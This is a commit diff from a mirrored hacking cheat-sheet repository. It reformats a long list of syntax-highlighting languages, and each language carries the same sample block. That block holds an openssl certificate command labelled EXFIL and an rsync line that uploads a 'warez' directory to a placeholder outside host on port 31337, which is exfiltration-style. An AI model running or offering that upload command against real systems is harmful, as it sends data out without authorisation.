mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-07-10 20:53:43 +02:00
list
This commit is contained in:
@@ -1,515 +1,618 @@
|
||||
abap
|
||||
```abap
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
actionscript
|
||||
```actionscript
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
ada
|
||||
```ada
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
apache_conf
|
||||
```apache_conf
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
applescript
|
||||
```applescript
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
asciidoc
|
||||
```asciidoc
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
assembly_x86
|
||||
```assembly_x86
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
autohotkey
|
||||
```autohotkey
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
batchfile
|
||||
```batchfile
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
c_cpp
|
||||
```c_cpp
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
cirru
|
||||
```cirru
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
clojure
|
||||
```clojure
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
cobol
|
||||
```cobol
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
coffee
|
||||
```coffee
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
coldfusion
|
||||
```coldfusion
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
csharp
|
||||
```csharp
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
csound_document
|
||||
```csound_document
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
csound_orchestra
|
||||
```csound_orchestra
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
csound_score
|
||||
```csound_score
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
css
|
||||
```css
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
d
|
||||
```d
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
dart
|
||||
```dart
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
diff
|
||||
```diff
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
django
|
||||
```django
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
dockerfile
|
||||
```dockerfile
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
eiffel
|
||||
```eiffel
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
ejs
|
||||
```ejs
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
elixir
|
||||
```elixir
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
elm
|
||||
```elm
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
erlang
|
||||
```erlang
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
forth
|
||||
```forth
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
ftl
|
||||
```ftl
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
gcode
|
||||
```gcode
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
gitignore
|
||||
```gitignore
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
glsl
|
||||
```glsl
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
golang
|
||||
```golang
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
groovy
|
||||
```groovy
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
haml
|
||||
```haml
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
handlebars
|
||||
```handlebars
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
haskell
|
||||
```haskell
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
haxe
|
||||
```haxe
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
html
|
||||
```html
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
ini
|
||||
```ini
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
io
|
||||
```io
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
jade
|
||||
```jade
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
java
|
||||
```java
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
javascript
|
||||
```javascript
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
json
|
||||
```json
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
jsoniq
|
||||
```jsoniq
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
jsp
|
||||
```jsp
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
julia
|
||||
```julia
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
less
|
||||
```less
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
liquid
|
||||
```liquid
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
lisp
|
||||
```lisp
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
livescript
|
||||
```livescript
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
lsl
|
||||
```lsl
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
lua
|
||||
```lua
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
makefile
|
||||
```makefile
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
markdown
|
||||
```markdown
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
mask
|
||||
```mask
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
matlab
|
||||
```matlab
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
nix
|
||||
```nix
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
nunjucks
|
||||
```nunjucks
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
objectivec
|
||||
```objectivec
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
ocaml
|
||||
```ocaml
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
pascal
|
||||
```pascal
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
perl
|
||||
```perl
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
pgsql
|
||||
```pgsql
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
php
|
||||
```php
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
powershell
|
||||
```powershell
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
prolog
|
||||
```prolog
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
properties
|
||||
```properties
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
protobuf
|
||||
```protobuf
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
python
|
||||
```python
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
r
|
||||
```r
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
razor
|
||||
```razor
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
rdoc
|
||||
```rdoc
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
ruby
|
||||
```ruby
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
rust
|
||||
```rust
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
sass
|
||||
```sass
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
scad
|
||||
```scad
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
scala
|
||||
```scala
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
scheme
|
||||
```scheme
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
scss
|
||||
```scss
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
sh
|
||||
```sh
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
smarty
|
||||
```smarty
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up```
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
```
|
||||
soy_template
|
||||
```soy_template
|
||||
#this is a comment
|
||||
# this is a comment
|
||||
